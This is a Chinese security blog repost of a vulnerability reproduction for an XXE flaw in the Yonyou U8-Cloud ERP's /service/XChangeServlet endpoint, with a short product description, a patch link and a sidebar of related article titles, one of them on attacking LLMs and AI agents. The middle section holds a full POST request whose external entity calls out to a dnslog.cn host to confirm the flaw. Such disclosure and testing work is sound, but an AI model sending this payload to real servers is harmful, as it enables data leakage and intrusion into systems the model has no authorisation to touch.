【成功复现】用友U8-Cloud系统XML外部实体注入漏洞(XXE)

admin

138296
文章

113
评论

2024年5月20日20:15:42评论110 views字数 826阅读2分45秒阅读模式

网安引领时代，弥天点亮未来

0x00写在前面

本次测试仅供学习使用，如若非法他用，与平台和本文作者无关，需自行负责！

0x01漏洞介绍

用友U8 cloud 聚焦成长型、创新型企业的云 ERP，基于全新的企业互联网应用设计理念，为企业提供集人财物客、产供销于一体的云 ERP 整体解决方案，全面支持多组织业务协同、智能财务，人力服务、构建产业链智造平台，融合用友云服务实现企业互联网资源连接、共享、协同。该系统/service/XChangeServlet接口存在XXE漏洞，攻击者可以在xml中构造恶意命令，会导致服务器数据泄露以及被远控。

0x02影响版本

用友-U8-Cloud

0x03漏洞复现

1.访问漏洞环境

【成功复现】用友U8-Cloud系统XML外部实体注入漏洞(XXE)

2.对漏洞进行复现

POC （POST）

漏洞复现

POST /service/XChangeServlet HTTP/1.1Host: 127.0.0.1User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36Content-Length: 129Connection: closeContent-Type: text/xmlAccept-Encoding: gzip<!DOCTYPE r [<!ELEMENT r ANY ><!ENTITY xxe SYSTEM "http://jbiag2.dnslog.cn/mt">]><r><a>&xxe;</a ></r>

测试DNSlog命令回显

【成功复现】用友U8-Cloud系统XML外部实体注入漏洞(XXE)

3.nuclei工具测试（漏洞存在）

【成功复现】用友U8-Cloud系统XML外部实体注入漏洞(XXE)

0x04修复建议

目前厂商已发布升级补丁以修复漏洞，补丁获取链接：

https://www.yonyou.com/https://security.yonyou.com/#/home

原文始发于微信公众号（弥天安全实验室）：【成功复现】用友U8-Cloud系统XML外部实体注入漏洞(XXE)

免责声明:文章中涉及的程序(方法)可能带有攻击性，仅供安全研究与教学之用，读者将其信息做其他用途，由读者承担全部法律及连带责任，本站不承担任何法律及连带责任；如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截，联系方式见首页)，望知悉。

左青龙
微信扫一扫

右白虎
微信扫一扫

【成功复现】用友U8-Cloud系统XML外部实体注入漏洞(XXE)

微软可信签名服务遭恶意滥用！三天有效证书成黑客隐身衣

使用DarwinOps设置和武装Mythic C2以针对MacOS

fastjson【1224rce】漏洞初探索及复现

vulhub靶场，基于docker的环境搭建

使用命令行混淆绕过检测

Devvortex靶机：Getshell只是渗透的开始

【应急响应】某变异Webshell流量分析（玄机靶场）

蓝队逆袭密码曝光：DeepSeek如何用AI实现攻击者透视挂

如何攻击LLM 和AI Agent（PART1）

Windows Active Directory 域允许攻击者提升权限漏洞

发表评论

在线咨询

微信